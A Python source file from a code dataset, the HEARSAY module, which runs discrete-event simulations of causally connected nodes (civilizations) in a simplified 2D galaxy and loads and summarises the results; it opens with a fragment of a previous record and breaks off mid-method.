plt.show()","repo_name":"ValeMargi/Laboratory_OON","sub_path":"Lab10/core/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4811,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"40494225327","text":"\"\"\"HEARSAY.\n\nThis module contains tools to compute and analyze numerical simulations of\na Galaxy with constrained causally connected nodes. It simulates a 2D\nsimplified version of a disk galaxy and perform discrete event simulations\nto explore three parameters:\n1. the mean time for the appeareance of new nodes,\n2. the mean lifetime of the nodes, and\n3. the maximum reach of signals.\n\nA simulation is a realization of the Constrained Causally Connected Network\n(C3Net) model. The details of this model are explained in\nLares, Funes & Gramajo (under review).\n\nClasses in this module:\n- Parser\n- C3Net\n- Results\n\nAdditionally, it contains the function unwrap_run which is used for parallel\nruns with the joblib library.\n\"\"\"\n\nimport numpy as np\nfrom configparser import ConfigParser\nimport itertools\nimport pandas as pd\nimport pickle\nimport sys\nfrom tqdm import tqdm\nfrom hearsay.olists import OrderedList\n\n\nclass Parser(ConfigParser):\n \"\"\"parser class.\n\n Manipulation of configuration parameters. This method allows to read a\n configuration file or to set parameters for a Constrained Causally\n Conected Network (C3Net) model.\n \"\"\"\n\n def __init__(self, argv=None, *args, **kwargs):\n \"\"\"Initialize a parser.\n\n Parameters\n ----------\n None\n Returns\n -------\n None\n Raises\n ------\n None\n \"\"\"\n super().__init__()\n self.message = None\n self.check_file(argv)\n self.read_config_file()\n\n self.load_filenames()\n self.load_config(*args, **kwargs)\n self.check_settings()\n\n def check_file(self, sys_args=\"\"):\n \"\"\"Parse paramenters for the simulation from a .ini file.\n\n Parameters\n ----------\n filename (str): the file name of the map to be read\n\n Raises\n ------\n None\n\n Returns\n -------\n None\n \"\"\"\n from os.path import isfile\n\n mess = (\"Configuration file expected:\"\n \"\\n\\t filename or CLI input\"\n \"\\n\\t example: python run_correlation.py\"\n \"\\n\\t ../set/experiment.ini\"\n \"\\n\\t Using default configuration file\")\n if isinstance(sys_args, str):\n if isfile(sys_args):\n msg = f\"Loading configuration parameters from {sys_args}\"\n self.message = msg\n filename = sys_args\n else:\n self.message = \"Input argument is not a valid file\\\n Using default configuration file instead\"\n filename = '../set/experiment.ini'\n\n elif isinstance(sys_args, list):\n\n if len(sys_args) == 2:\n filename = sys_args[1]\n\n if isfile(filename):\n msg = f\"Loading configuration parameters from {filename}\"\n self.message = msg\n else:\n self.message = mess\n filename = '../set/experiment.ini'\n else:\n self.message = mess\n filename = '../set/experiment.ini'\n\n else:\n self.message = mess\n filename = '../set/experiment.ini'\n\n self.filename = filename\n\n def read_config_file(self):\n \"\"\"Parse paramenters for the simulation from a .ini file.\n\n Parameters\n ----------\n None\n\n Raises\n ------\n None\n\n Returns\n -------\n None\n \"\"\"\n self.read(self.filename)\n\n def load_filenames(self):\n \"\"\"Make filenames based on info in config file.\n\n Parameters\n ----------\n None\n\n Raises\n ------\n None\n\n Returns\n -------\n list of filenames\n \"\"\"\n from collections import namedtuple\n\n # Experiment settings\n exp_id = self['experiment']['exp_id']\n dir_plots = self['output']['dir_plots']\n pars_root = self['output']['pars_root']\n progress_root = self['output']['progress_root']\n dir_output = self['output']['dir_output']\n plot_fname = self['output']['plot_fname']\n plot_ftype = self['output']['plot_ftype']\n\n fname = dir_plots + plot_fname + '_' + exp_id + plot_ftype\n\n names = 'exp_id \\\n dir_plots \\\n dir_output \\\n pars_root \\\n progress_root \\\n plot_fname \\\n plot_ftype \\\n fname'\n\n parset = namedtuple('pars', names)\n\n res = parset(exp_id,\n dir_plots,\n dir_output,\n pars_root,\n progress_root,\n plot_fname,\n plot_ftype,\n fname)\n\n self.filenames = res\n\n def load_config(self, keys=None, values=None, nran=None,\n *args, **kwargs):\n \"\"\"Load parameters from config file.\n\n Parameters\n ----------\n None\n\n Raises\n ------\n None\n\n Returns\n -------\n list of parameters as a named tuple\n \"\"\"\n if isinstance(keys, list):\n # override configuration file with arguments\n if len(keys) != len(values):\n print('Error overriding parameters (using file values)')\n else:\n for k, v in zip(keys, values):\n for sec in self.sections():\n has = self.has_option(sec, k)\n if has:\n self[sec][k] = v\n\n choice = self['UX']['verbose']\n if choice.lower() in 'yesitrue':\n verbose = True\n elif choice.lower() in 'nofalse':\n verbose = False\n else:\n print('warning in .ini file: UX: verbose')\n verbose = False\n\n if verbose:\n print('loading parameters...')\n from collections import namedtuple\n\n ghz_inner = float(self['simu']['ghz_inner'])\n ghz_outer = float(self['simu']['ghz_outer'])\n\n t_max = float(self['simu']['t_max'])\n\n tau_a_min = float(self['simu']['tau_a_min'])\n tau_a_max = float(self['simu']['tau_a_max'])\n tau_a_nbins = int(self['simu']['tau_a_nbins'])\n\n tau_s_min = float(self['simu']['tau_s_min'])\n tau_s_max = float(self['simu']['tau_s_max'])\n tau_s_nbins = int(self['simu']['tau_s_nbins'])\n\n d_max_min = float(self['simu']['d_max_min'])\n d_max_max = float(self['simu']['d_max_max'])\n d_max_nbins = int(self['simu']['d_max_nbins'])\n\n if nran is None:\n nran = int(self['simu']['nran'])\n\n choices = self['simu']['run_parallel']\n if choices.lower() in 'yesitrue':\n run_parallel = True\n elif choices.lower() in 'nofalse':\n run_parallel = False\n else:\n run_parallel = False\n\n # Experiment settings\n exp_id = self['experiment']['exp_id']\n njobs = int(self['simu']['njobs'])\n dir_plots = self['output']['dir_plots']\n dir_output = self['output']['dir_output']\n pars_root = self['output']['pars_root']\n plot_fname = self['output']['plot_fname']\n plot_ftype = self['output']['plot_ftype']\n fname = dir_plots + plot_fname + '_' + exp_id + plot_ftype\n\n choice = self['UX']['show_progress']\n if choice.lower() in 'yesitrue':\n showp = True\n elif choice.lower() in 'nofalse':\n showp = False\n else:\n print('warning in .ini file: UX: show_progress')\n showp = False\n\n string_overwrite = self['output']['clobber']\n if string_overwrite.lower() in 'yesitrue':\n overwrite = True\n elif string_overwrite.lower() in 'nofalse':\n overwrite = False\n else:\n print('warning in .ini file: output: clobber')\n overwrite = False\n\n names = ['ghz_inner',\n 'ghz_outer',\n 't_max',\n 'tau_a_min',\n 'tau_a_max',\n 'tau_a_nbins',\n 'tau_s_min',\n 'tau_s_max',\n 'tau_s_nbins',\n 'd_max_min',\n 'd_max_max',\n 'd_max_nbins',\n 'nran',\n 'run_parallel',\n 'njobs',\n 'exp_id',\n 'dir_plots',\n 'dir_output',\n 'pars_root',\n 'plot_fname',\n 'plot_ftype',\n 'fname',\n 'showp',\n 'overwrite',\n 'verbose']\n names = ' '.join(names)\n\n parset = namedtuple('pars', names)\n\n res = parset(ghz_inner,\n ghz_outer,\n t_max,\n tau_a_min,\n tau_a_max,\n tau_a_nbins,\n tau_s_min,\n tau_s_max,\n tau_s_nbins,\n d_max_min,\n d_max_max,\n d_max_nbins,\n nran,\n run_parallel,\n njobs,\n exp_id,\n dir_plots,\n dir_output,\n pars_root,\n plot_fname,\n plot_ftype,\n fname,\n showp,\n overwrite,\n verbose)\n\n self.p = res\n\n def check_settings(self):\n \"\"\"Check if parameters make sense.\n\n Parameters\n ----------\n None\n\n Raises\n ------\n None\n\n Returns\n -------\n Exception if settings have inconsistencies.\n \"\"\"\n from os import path, makedirs\n\n if self.p.verbose:\n print(self.message)\n print('Checking settings...')\n\n # output directory\n if not path.isdir(self.p.dir_output):\n print(f\"Directory {self.p.dir_output} does not exist\")\n\n try:\n makedirs(self.p.dir_output)\n if self.p.verbose:\n print(\"Directory \", self.p.dir_output, \" Created \")\n except FileExistsError:\n # directory already exists\n pass\n\n # experiment directory\n ID_dir = self.p.dir_output + self.p.exp_id\n if not path.isdir(ID_dir):\n print(f\"Directory {ID_dir} does not exist\")\n\n try:\n makedirs(ID_dir)\n if self.p.verbose:\n print(\"Directory \", ID_dir, \" Created \")\n except FileExistsError:\n # directory already exists\n pass\n\n # plots directory\n if not path.isdir(self.p.dir_plots):\n print(f\"Directory {self.p.dir_plots} does not exist\")\n\n try:\n makedirs(self.p.dir_plots)\n if self.p.verbose:\n print(\"Directory \", self.p.dir_plots, \" Created \")\n except FileExistsError:\n # directory already exists\n pass\n\n\ndef unwrap_run(arg, **kwarg):\n \"\"\"Wrap the serial function for parallel run.\n\n This function just call the serialized version, but allows to run\n it concurrently.\n \"\"\"\n return C3Net.run_suite(*arg, **kwarg)\n\n\nclass C3Net():\n \"\"\"C3Net: Constrained Causally Connected Network model.\n\n methods:\n init:\n creates a node\n __len__:\n None\n __repr__:\n None\n __str__:\n None\n run:\n Run a suite of simulations for the full parametet set in\n the configuration file.\n run_suite:\n Run a suite of simulations for a given parameter set.\n run_suite_II:\n Run a suite of simulations for a given parameter set, to\n be run in parallel.\n run_simulation:\n Run a simulation for a point in parameter space.\n show_single_ccns:\n Show the contents of a simulation run.\n \"\"\"\n\n def __init__(self, conf=None):\n \"\"\"Instantiate Galaxy object.\n\n Parameters\n ----------\n None\n \"\"\"\n self.params = None\n self.config = conf\n\n def __len__(self):\n \"\"\"Return the number of contacts.\n\n Parameters\n ----------\n None\n \"\"\"\n pass\n\n def __repr__(self):\n \"\"\"Represent with a string.\n\n Parameters\n ----------\n None\n \"\"\"\n print('message')\n\n def __str__(self):\n \"\"\"Represent with a string.\n\n Parameters\n ----------\n None\n \"\"\"\n print('message')\n\n def prepare_dirs(self, filenames):\n \"\"\"Prepare directories for experiments from dataframes.\n\n Takes a list of paths and filenames and check if all\n paths exist.\n\n Parameters\n ----------\n filenames : list\n A list with all filenames\n Returns\n -------\n None\n \"\"\"\n from os import path, makedirs\n for f in filenames:\n s = f.split('/')\n for k in range(1, len(s)):\n d = '/'.join(s[:k])\n if d == '.' or d == '..':\n continue\n if not path.isdir(d):\n makedirs(d)\n\n def set_parameters(self, spars=None,\n A=None, S=None, D=None,\n write_file=False):\n \"\"\"Set parameters for the experiment.\n\n If no arguments are given, the parameters are set from the ini file.\n Parameters\n ----------\n spars (dataframe, list or string, optional):\n Parameters to set the experiment.\n If spars is a pandas DataFrame, it must contain the keys:\n ['tau_awakening', 'tau_survive', 'd_max', 'filename'].\n If spars is a list, it must have length=4, comprisong the\n tau_awakening, tau_survive, d_max, and filename lists.\n If spars is a string, a file with that name will be read.\n The file must contain the same four columns, with the names.\n A (number or list, optional): Values of the tau_awakening parameter\n S (number or list, optional): Values of the tau_survive parameter\n D (number or list, optional): Values of the D_max parameter\n write_file (optional): filename to write the parameter set.\n \"\"\"\n p = self.config.p\n\n if spars is None:\n tau_awakeningS = np.linspace(p.tau_a_min, p.tau_a_max,\n p.tau_a_nbins)\n tau_surviveS = np.linspace(p.tau_s_min, p.tau_s_max, p.tau_s_nbins)\n D_maxS = np.linspace(p.d_max_min, p.d_max_max, p.d_max_nbins)\n else:\n if isinstance(spars, pd.DataFrame):\n tau_awakeningS = spars['tau_awakening']\n tau_surviveS = spars['tau_survive']\n D_maxS = spars['D_max']\n filenames = spars['filename']\n self.prepare_dirs(filenames)\n elif isinstance(spars, list):\n tau_awakeningS = spars[0]\n tau_surviveS = spars[1]\n D_maxS = spars[2]\n else:\n print('warning: a dataframe or list expected for spars')\n pass\n\n if A is not None:\n tau_awakeningS = A\n if S is not None:\n tau_surviveS = S\n if D is not None:\n D_maxS = D\n\n df = pd.DataFrame(columns=['tau_awakening', 'tau_survive',\n 'D_max', 'filename'])\n if isinstance(spars, pd.DataFrame):\n if p.verbose:\n print('parameters dataframe detected')\n df['tau_awakening'] = spars['tau_awakening']\n df['tau_survive'] = spars['tau_survive']\n df['D_max'] = spars['D_max']\n df['filename'] = spars['filename']\n elif isinstance(spars, list):\n if p.verbose:\n print('parameters list deteted')\n params = []\n prd = itertools.product(tau_awakeningS, tau_surviveS, D_maxS)\n for i in prd:\n params.append(i)\n k = 0\n j = 0\n for pp in params:\n (tau_awakening, tau_survive, D_max) = pp\n k += 1\n i = 0\n for experiment in range(p.nran):\n i += 1\n j += 1\n dirName = p.dir_output+p.exp_id + '/D' + str(int(D_max))\n filename = dirName + '/' + str(k).zfill(5) + '_'\n filename = filename + str(i).zfill(3) + '.pk'\n df.loc[j] = [tau_awakening, tau_survive, D_max, filename]\n elif isinstance(spars, str):\n if p.verbose:\n print('parameters file detected')\n df = pd.read_csv(spars)\n elif spars is None:\n print('default action: load from config file')\n params = []\n prd = itertools.product(tau_awakeningS, tau_surviveS, D_maxS)\n for i in prd:\n params.append(i)\n k = 0\n j = 0\n\n A = []\n S = []\n D = []\n F = []\n\n outdir = p.dir_output + p.exp_id + '/D'\n for pp in params:\n (tau_awakening, tau_survive, D_max) = pp\n k += 1\n i = 0\n for experiment in range(p.nran):\n A.append(tau_awakening)\n S.append(tau_survive)\n D.append(D_max)\n\n i += 1\n j += 1\n parts = [outdir, str(int(D_max)), '/', str(k).zfill(5),\n '_', str(i).zfill(3) + '.pk']\n filename = ''.join(parts)\n\n F.append(filename)\n\n df['tau_awakening'] = A\n df['tau_survive'] = S\n df['D_max'] = D\n df['filename'] = F\n else:\n if spars is not None:\n print('spars must be dataframe, list or string')\n # write files list\n fn = self.config.filenames\n fname = fn.dir_output + '/' + fn.exp_id\n fname = fname + '/' + fn.pars_root + '.csv'\n df.to_csv(fname, index=False)\n\n self.params = df\n\n def run(self, parallel=False, njobs=None, interactive=False):\n \"\"\"Run an experiment.\n\n An experiment requires a set of at least three parameters, which are\n taken from the configuration file.\n\n Parameters\n ----------\n parallel : Boolean\n Flag to indicate if run is made using the parallelized version.\n Default: False.\n njobs : int\n Number of concurrent jobs for the parallel version.\n If parallel is False njobs is ignored.\n interactive : boolean\n Flag to indicate if the result of the simulation suite is returned\n as a variable.\n\n Returns\n -------\n res: list\n Only returned if interactive=True.\n Contains the results from the simulations. The size of the\n list is the number of simulations in the experiment, i.e., the\n number of lines in self.params.\n Each element of the list is a dictionary containing the complete\n list of CCNs and their contacts.\n\n See also\n --------\n hearsay.results.ccn_stats\n\n Example\n -------\n If the following experiment is set:\n >>> conf.load_config(['nran'], ['2']\n >>> A = [5000, 10000, 20000]\n >>> S = [20000]\n >>> D = [20000]\n >>> G.set_parameters(A=A, S=S, D=D)\n then a total of 6 experiments will be performed. The result of this\n function is a list of length 6, each element containing an element that\n can be printed with the show_single_ccns method. See that method for\n more details.\n \"\"\"\n if njobs is not None:\n parallel = True\n\n if parallel:\n if njobs is None:\n njobs = self.config.p.njobs\n if interactive:\n res = self.run_suite_II(njobs, interactive)\n else:\n self.run_suite_II(njobs)\n else:\n if interactive:\n res = self.run_suite(interactive)\n else:\n self.run_suite()\n\n if interactive:\n return res\n else:\n return None\n\n def run_suite_II(self, njobs, interactive=False):\n \"\"\"Run an experiment, parallel version.\n\n An experiment requires a set of at least three parameters, which are\n taken from the configuration file.\n\n Parameters\n ----------\n params: the parameters\n njobs: number of jobs\n \"\"\"\n from joblib import Parallel, delayed\n\n Pll = Parallel(n_jobs=njobs, verbose=5, prefer=\"processes\")\n params = self.params.values.tolist()\n ids = np.array(range(len(params))) + 1\n ntr = [interactive]*len(params)\n z = zip([self]*len(params), params, ids, ntr)\n d_experiment = delayed(unwrap_run)\n results = Pll(d_experiment(i) for i in z)\n\n df = pd.DataFrame(columns=['tau_awakening', 'tau_survive',\n 'D_max', 'filename'])\n\n p = self.config.p\n k = 0\n j = 0\n for pp in params:\n (tau_awakening, tau_survive, D_max) = pp\n k += 1\n i = 0\n for experiment in range(p.nran):\n i += 1\n j += 1\n dirName = p.dir_output+p.exp_id + '/D' + str(int(D_max))+'/'\n filename = dirName + str(k).zfill(5) + '_'\n filename = filename + str(i).zfill(3) + '.pk'\n df.loc[j] = [tau_awakening, tau_survive, D_max, filename]\n\n # write files\n fn = self.config.filenames\n fname = fn.dir_output + '/' + fn.exp_id\n fname = fname + '/' + fn.pars_root + '.csv'\n df.to_csv(fname, index=False)\n\n if interactive:\n return results\n else:\n return None\n\n def run_suite(self, interactive=False):\n \"\"\"Make experiment.\n\n Requires a single value of parameters.\n Writes output on a file\n\n Parameters\n ----------\n params (list): A list containing all parameters for the\n simulation. Format, e.g.: [(A1,S1,D1), (A2,S2,D2)]\n\n Raises\n ------\n None\n\n Returns\n -------\n None\n \"\"\"\n from os import makedirs, path\n\n p = self.config.p\n params = self.params.values.tolist()\n\n try:\n dirName = p.dir_output + p.exp_id+''\n makedirs(dirName)\n if p.verbose:\n print(\"Directory \", dirName, \" Created \")\n except FileExistsError:\n print(\"Directory \", dirName, \" already exists\")\n\n Dl = list(map(list, zip(*params)))[2]\n D_max_names = [str(int(d)) for d in Dl]\n D_maxS = list(set(D_max_names))\n\n for d in D_maxS:\n dirName = p.dir_output + p.exp_id + '/D' + str(int(d))\n try:\n makedirs(dirName)\n if p.verbose:\n print(\"Directory \", dirName, \" Created \")\n except FileExistsError:\n print(\"Directory \", dirName, \" already exists\")\n\n if p.showp:\n bf1 = \"{desc}: {percentage:.4f}% | \"\n bf2 = \"{n_fmt}/{total_fmt} ({elapsed}/{remaining})\"\n bf = ''.join([bf1, bf2])\n iterator = tqdm(params, bar_format=bf)\n else:\n iterator = params\n\n results = []\n for pp in iterator:\n (tau_awakening, tau_survive, D_max, filename) = pp\n pars = list(pp)\n if path.isfile(filename):\n if p.overwrite:\n self.run_simulation(p, pars)\n pickle.dump(self.MPL, open(filename, \"wb\"))\n elif interactive:\n self.run_simulation(p, pars)\n MPL = self.MPL\n results.append(MPL)\n else:\n self.run_simulation(p, pars)\n pickle.dump(self.MPL, open(filename, \"wb\"))\n if interactive:\n MPL = self.MPL\n results.append(MPL)\n\n fn = ''.join([p.dir_output, p.exp_id, '/',\n self.config.filenames.progress_root, '.csv'])\n with open(fn, 'a') as file:\n w = f\"{tau_awakening}, {tau_survive}, {D_max}, {filename}\\n\"\n file.write(w)\n\n if interactive:\n return results\n else:\n return None\n\n def run_simulation(self, p=None, pars=None):\n \"\"\"Make experiment.\n\n A single value of parameters\n\n Parameters\n ----------\n p (configuration object) : configuration object\n pars (list) : list of (3) parameters:\n tau_A, tau_S and D_max\n\n Raises\n ------\n None\n\n Returns\n -------\n MPL : list\n\n MPL is a list of size the number of nodes in the simulation.\n Each element of this list contains a list whose first element\n is: \n [ID of CCN,\n ID of CCN (repeated),\n x coordinate of the position in the Galaxy,\n y coordinate of the position in the Galaxy,\n time of the A event,\n time of the D event]\n Moreover, if there are contacts with this node:\n [ID of receiving node,\n ID of emiting node,\n x coordinate of the position in the Galaxy of emiting node,\n y coordinate of the position in the Galaxy of emiting node,\n time of the C event,\n time of the B event]\n \"\"\"\n if p is None:\n p = self.config.p\n if pars is None:\n ps = self.config.p\n tau_awakening = ps.tau_a_min\n tau_survive = ps.tau_s_min\n D_max = ps.d_max_min\n else:\n tau_awakening = pars[0]\n tau_survive = pars[1]\n D_max = pars[2]\n\n import numpy as np\n import random\n from scipy import spatial as sp\n\n random.seed()\n np.random.seed()\n\n # list of all MPLs\n MPL = dict()\n\n # list of active MPLs\n CHATs = []\n CHATs_idx = []\n\n # inicializacion del tiempo: scalar\n t_now = 0\n\n # lista de tiempos de eventos futuros: ordered list\n # [time, ID_emit, ID_receive, case]\n t_forthcoming = OrderedList()\n\n # estructura de arbol para buscar vecinos\n if 'tree' in locals():\n try:\n del tree\n except NameError:\n pass\n\n # INITIALIZATION\n # Simulation starts when the first CETI appears:\n next_event = [0., 0, None, 1]\n t_forthcoming.add(next_event)\n\n # SIMULATION LOOP OVER TIME\n while (t_now < p.t_max):\n\n t_now, ID_emit, ID_hear, case = t_forthcoming.head.getData()\n\n if case == 1:\n\n # print('desaparece CETI con id:%d' % ID_emit)\n ID_new = ID_emit\n ID_next = ID_new + 1\n t_new_hola = t_now\n\n # sortear el lugar donde aparece dentro de la GHZ\n r = np.sqrt(random.random()*p.ghz_outer**2 +\n p.ghz_inner**2)\n o = random.random()*2.*np.pi\n x = r * np.cos(o) # X position on the galactic plane\n y = r * np.sin(o) # Y position on the galactic plane\n\n # sortear el tiempo de actividad\n t_new_active = np.random.exponential(tau_survive, 1)[0]\n t_new_chau = t_new_hola + t_new_active\n\n # agregar el tiempo de desaparición a la lista de tiempos\n next_event = [t_new_chau, ID_new, None, 2]\n t_forthcoming.add(next_event)\n\n # agregar la CETI a la lista histórica\n MPL[ID_new] = list()\n MPL[ID_new].append(\n (ID_new, ID_new, x, y, t_new_hola, t_new_chau))\n\n # sortear el tiempo de aparición de la próxima CETI\n t_next_awakening = np.random.exponential(tau_awakening, 1)[0]\n t_next_awakening = t_new_hola + t_next_awakening\n if t_next_awakening < p.t_max:\n next_event = [t_next_awakening, ID_next, None, 1]\n t_forthcoming.add(next_event)\n\n if len(CHATs_idx) > 0:\n\n # if there are other MPL, compute contacts:\n # encontrar todas (los IDs de) las MPL dentro de D_max\n query_point = [x, y]\n if 'tree' in locals():\n try:\n idx = tree.query_ball_point(query_point, r=D_max)\n except NameError:\n pass\n else:\n idx = []\n\n # traverse all MPL within reach\n for k in idx:\n\n ID_old = CHATs_idx[k]\n\n Dx = np.sqrt(\n ((np.array(query_point) -\n np.array(MPL[ID_old][0][2:4]))**2).sum()\n )\n\n t_old_hola, t_old_chau = MPL[ID_old][0][4:6]\n\n # check if contact is possible\n new_can_see_old = (\n (Dx < D_max) &\n (t_new_hola < t_old_chau + Dx) &\n (t_new_chau > t_old_hola + Dx))\n\n if new_can_see_old: # (·) new sees old\n\n # :start (type 3 event)\n t_new_see_old_start = max(t_old_hola + Dx,\n t_new_hola)\n next_event = [t_new_see_old_start,\n ID_new, ID_old, 3]\n t_forthcoming.add(next_event)\n\n # :end (type 4 event)\n t_new_see_old_end = min(t_old_chau + Dx,\n t_new_chau)\n next_event = [t_new_see_old_end, ID_new, ID_old, 4]\n t_forthcoming.add(next_event)\n\n contact = (ID_new, ID_old,\n MPL[ID_old][0][2], MPL[ID_old][0][3],\n t_new_see_old_start, t_new_see_old_end)\n MPL[ID_new].append(contact)\n\n # check if contact is possible\n old_can_see_new = (\n (Dx < D_max) & (t_new_hola+Dx > t_old_hola) &\n (t_new_hola+Dx < t_old_chau))\n\n if old_can_see_new: # (·) old sees new\n\n # :start (type 3 event)\n t_old_see_new_start = t_new_hola + Dx\n next_event = [t_old_see_new_start,\n ID_old, ID_new, 3]\n t_forthcoming.add(next_event)\n\n # :end (type 4 event)\n t_old_see_new_end = min(t_new_chau+Dx, t_old_chau)\n next_event = [t_old_see_new_end, ID_old, ID_new, 4]\n t_forthcoming.add(next_event)\n\n contact = (ID_old, ID_new,\n MPL[ID_new][0][2], MPL[ID_new][0][3],\n t_old_see_new_start, t_old_see_new_end)\n MPL[ID_old].append(contact)\n\n # agregar la CETI a la lista de posiciones\n # de MPL activas (CHATs)\n CHATs.append([x, y])\n CHATs_idx.append(ID_new)\n\n # rehacer el árbol\n tree = sp.cKDTree(data=CHATs)\n\n if case == 2:\n ID_bye = ID_emit\n\n # eliminar la CETI a la lista de MPL activas\n # [ID, x, y, t_new_hola, t_new_chau]\n try:\n id_loc = CHATs_idx.index(ID_bye)\n del CHATs[id_loc]\n del CHATs_idx[id_loc]\n\n except TypeError:\n pass\n\n # rehacer el árbol\n if len(CHATs) > 0:\n tree = sp.cKDTree(data=CHATs)\n\n if case == 3:\n pass\n if case == 4:\n pass\n\n # eliminar el tiempo actual\n t_forthcoming.remove_first()\n # salir si no queda nada para hacer:\n if t_forthcoming.size() < 1:\n break\n # t_forthcoming.show()\n\n self.MPL = MPL\n\n def show_single_ccns(self, MPL=None, interactive=False):\n \"\"\"Show simulation results.\n\n Parameters\n ----------\n None\n \"\"\"\n if MPL is None:\n CETIs = self.MPL\n else:\n CETIs = MPL\n\n for i in range(len(CETIs)):\n print('%2d (%5.0f, %5.0f) yr <%5.0f, %5.0f> lyr' %\n (CETIs[i][0][1], CETIs[i][0][4],\n CETIs[i][0][5], CETIs[i][0][2], CETIs[i][0][3]))\n\n k = len(CETIs[i]) - 1\n for j in range(k):\n Dx = np.sqrt(((\n np.array(CETIs[i][0][2:4]) -\n np.array(CETIs[i][j+1][2:4]))**2).sum())\n\n print('%2d sees %2d (%5.0f, %5.0f) yr \\\n <%5.0f, %5.0f> lyr distance=%f' % (CETIs[i][j+1][0],\n CETIs[i][j+1][1],\n CETIs[i][j+1][4],\n CETIs[i][j+1][5],\n CETIs[i][j+1][2],\n CETIs[i][j+1][3], Dx))\n if interactive:\n return CETIs\n\n\nclass Results(C3Net):\n \"\"\"results: load and visualize results from simulations and experiments.\n\n description\n \"\"\"\n\n \"\"\"\n To do:\n - number of contacts\n \"\"\"\n\n def __init__(self, G=None):\n \"\"\"Instantiate a results object.\n\n Parameters\n ----------\n G: C3Net object\n An object containing all the data about the simulation suite.\n \"\"\"\n self.params = dict()\n self.config = tuple()\n if G is not None:\n self.params = G.params\n self.config = G.config\n\n def load(self):\n \"\"\"Load parameter set and data.\n\n Load all data generated from an experiment.\n \"\"\"\n fn = self.config.filenames\n fname = fn.dir_output + fn.exp_id\n fname = fname + '/' + fn.pars_root + '.csv'\n df = pd.read_csv(fname)\n self.params = df\n\n def ccn_stats(self, CCN):\n \"\"\"Return statistics for a single causally connected network.\n\n This corresponds to a single simulation run, that gives a list of\n nodes, its properties and its contacts. The properties of a node are\n the ID, the times of the A and D events and the postition in the\n (simulated) Galaxy.\n\n Parameters\n ----------\n CCN : dict\n An object (as read from pickle files) that represents a network of\n CCNs from a single simulation run\n\n Returns\n -------\n stats : tuple\n A tuple containing several statistics about the network.\n\n\n Notes\n -----\n The stats tuple includes parameters with counters (1, 2, 3),\n parameters with CCNs values (4-7) and\n parameters with contacts values (8-11)\n\n 01. N : Total number of CCNs in the full period. Length=1\n\n 02. M : Total number of contacts (i.e., CCNs that are on the\n space-time cone of another CCN.)\n\n 03. K : Total number of CCNs that make at least one contact\n (i.e., CCNs that are on the space-time cone of at least\n another CCN.)\n\n 04. lP : Time periods for each CCN. Equivalent to the time span\n between the A and D events. Length=N\n\n 05. lI : Number of contacts each CETI receives. Length=N\n\n 06. lX : X position within the Galaxy disc. Length=N\n\n 07. lY : Y position within the Galaxy disc. Length=N\n\n 08. lL : Distances between contacted nodes. Length=K\n\n 09. lH : Duration of each contact. Length=K\n\n 10. lW : Time elapsed from awakening to contact. Length=K\n\n 11. lF : Time elapsed from awakening to the first contact.\n length=N\n \"\"\"\n N = len(CCN)\n M = 0\n K = 0\n\n lP = []\n lI = []\n lX = []\n lY = []\n lL = []\n lH = []\n lW = []\n lF = []\n\n for i in range(N):\n\n k = len(CCN[i])\n lI.append(k-1)\n lP.append(CCN[i][0][5] - CCN[i][0][4])\n lX.append(CCN[i][0][2])\n lY.append(CCN[i][0][3])\n\n firstcontact = 1.e8\n\n #if k > 0:\n # t_A = CCN[i][0][4]\n # t_C = CCN[i][1][4]\n #firstcontact = CCN[i][1][4] - CCN[i][0][4]\n\n for j in range(1, k): # traverse contacts\n\n earlier = CCN[i][j][4] - CCN[i][0][4]\n firstcontact = min(earlier, firstcontact)\n Dx = np.sqrt(((\n np.array(CCN[i][0][2:4]) -\n np.array(CCN[i][j][2:4]))**2).sum())\n\n lW.append(earlier)\n lL.append(Dx)\n lH.append(CCN[i][j][5] - CCN[i][j][4])\n\n if k > 1:\n lF.append(firstcontact)\n\n return (N, M, K), (lP, lI, lX, lY, lL, lH, lW, lF)\n\n def redux(self, subset=None):\n \"\"\"Redux experiment.\n\n Given a set of parameters, returns the global values\n\n Parameters\n ----------\n subset : boolean array\n Filter to the values in self.params\n\n Returns\n -------\n N : list\n Total number of nodes for each simulation in self.params\n M : list\n Total number of contacts for each simulation in self.params\n A contact is produced any time a node enters the light\n cone of another node.\n K : list\n Total number of nodes that make at least one contact, for\n each simulation in self.params.\n lP : array\n Time periods from t_A to t_D.\n lI : array\n Number of contacts that each node receives.\n lX : array\n X position within the Galaxy disc.\n lY : array\n Y position within the Galaxy disc.\n lL : array\n Distances between contacted nodes.\n lH : array\n Duration of each contact.\n lW : array\n Time elapsed from awakening to contact.\n lF : array\n Time elapsed from awakening to the first contact.\n \"\"\"\n import pickle\n\n if subset is None:\n D = self.params\n else:\n D = self.params[subset]\n\n N = []\n M = []\n K = []\n\n lP = []\n lI = []\n lX = []\n lY = []\n lL = []\n lH = []\n lW = []\n lF = []\n\n for filename in D['filename']:\n\n try:\n CETIs = pickle.load(open(filename, \"rb\"))\n except EOFError:\n CETIs = []\n\n t1, t2 = self.ccn_stats(CETIs)\n\n N.append(t1[0])\n M.append(t1[1])\n K.append(t1[2])\n lP.append(t2[0])\n lI.append(t2[1])\n lX.append(t2[2])\n lY.append(t2[3])\n lL.append(t2[4])\n lH.append(t2[5])\n lW.append(t2[6])\n lF.append(t2[7])\n\n return({\n 'N': N,\n 'M': M,\n 'K': K,\n 'lP': lP,\n 'lI': lI,\n 'lX': lX,\n 'lY': lY,\n 'lL': lL,\n 'lH': lH,\n 'lW': lW,\n 'lF': lF})\n\n def redux_1d(self, subset=None, applyto=None):\n \"\"\"Reddux experiment.\n\n Compute statistics for the set of parameters limited to subset\n\n Parameters\n ----------\n subset: logical array\n Filter for the full parameter set.\n applyto: string\n Name of the variable to be used as X-axis\n Results\n -------\n\n \"\"\"\n import pickle\n import numpy as np\n\n if subset is None:\n D = self.params\n else:\n D = self.params[subset]\n\n index = []\n firstc = []\n ncetis = []\n awaken = [] # lapso de tiempo que esta activa\n waiting = [] # lapso de tiempo que espera hasta el primer contacto\n inbox = [] # cantidad de cetis que esta escuchando\n distancias = [] # distancias a las cetis contactadas\n hangon = [] # lapso de tiempo que esta escuchando otra CETI\n x = []\n y = []\n N = len(D)\n kcross = 0\n\n for filename in D['filename']:\n\n try:\n CETIs = pickle.load(open(filename, \"rb\"))\n except EOFError:\n CETIs = []\n\n M = len(CETIs)\n ncetis.append(M)\n\n for i in range(M):\n\n k = len(CETIs[i])\n inbox.append(k-1)\n awaken.append(CETIs[i][0][5] - 